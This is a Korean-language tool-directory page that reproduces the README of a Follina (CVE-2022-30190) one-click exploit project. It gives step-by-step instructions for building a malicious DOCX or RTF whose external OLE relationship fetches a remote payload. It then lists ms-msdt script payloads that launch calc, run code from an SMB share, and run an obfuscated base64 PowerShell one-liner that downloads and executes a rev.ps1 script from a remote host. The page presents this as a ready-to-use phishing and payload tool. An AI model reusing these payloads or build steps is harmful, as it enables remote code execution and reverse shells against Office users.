Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
MS-MSDT-Office-RCE-Follina — CVE-2022-30190 | MS-MSDT Follina 원클릭 | Kitploit
도구/GitHubGitHub/0xflagplz/ms-msdt-office-rce-follina
Phishing ToolsPayload GenerationExploitationLateral MovementWeb Application ExploitationCommand and Control
GitHub0xflagplz/ms-msdt-office-rce-follina

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina 원클릭

저장소 보기
20124년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina 원클릭

  1. Docx 파일을 생성합니다.
  2. Docx 파일에서, 삽입 > 개체 > 비트맵 이미지 > 확인
  3. 실행된 그림판 애플리케이션에서 그림판 파일을 저장합니다.
  4. Docx 파일을 저장합니다.
  5. 파일을 아카이브로 엽니다 (7Zip 사용; 마우스 오른쪽 클릭 > 7Zip > 아카이브 열기.)
  6. \Word\에서 Document.xml을, \word_rels\에서 document.xml.rels 파일을 복사합니다.
  7. \word_rels\Document.xml.rels를 열고/편집하여 "/relationships/oleObject"가 포함된 관계 XML 태그를 찾습니다. 그런 다음 "Target="의 대상을 페이로드를 가져올 원격 대상으로 바꿉니다. 또한 XML 태그에 "TargetMode="External""을 추가합니다.
  8. 다시 Docx 파일로 압축합니다 (보내기 > 압축(zip) 폴더 | 파일 형식을 zip에서 docx/doc로 변경)

RTF 파일 형식

아래의 매개변수 단계/매개변수를 사용하여 docx가 저장된 후, Docx를 RTF로 저장합니다.

또한 word/document.xml의 <o:OLEObject> 요소 아래에 다음 요소를 추가하는 경우:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

재압축 과정은 JohnHammond의 Python 스크립트에서도 확인할 수 있습니다:
~ 원본 Office 파일 재구축 ~

root@kitploit:~
shutil.make_archive(args.output, "zip", doc_path)  
os.rename(args.output + ".zip", args.output)  

참고: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py


페이로드

기본 계산기 실행:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

Start-Process('calc')를 다음으로 바꿀 수 있습니다:

IEX('calc.exe')


SMB 공유 실행:

root@kitploit:~
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)"";
</script>

PS1 파일 로드:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  

디코딩: Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))


Apache2 access.log는 파일을 열 때 연결을 표시해야 합니다

로그 예시

도구 다운로드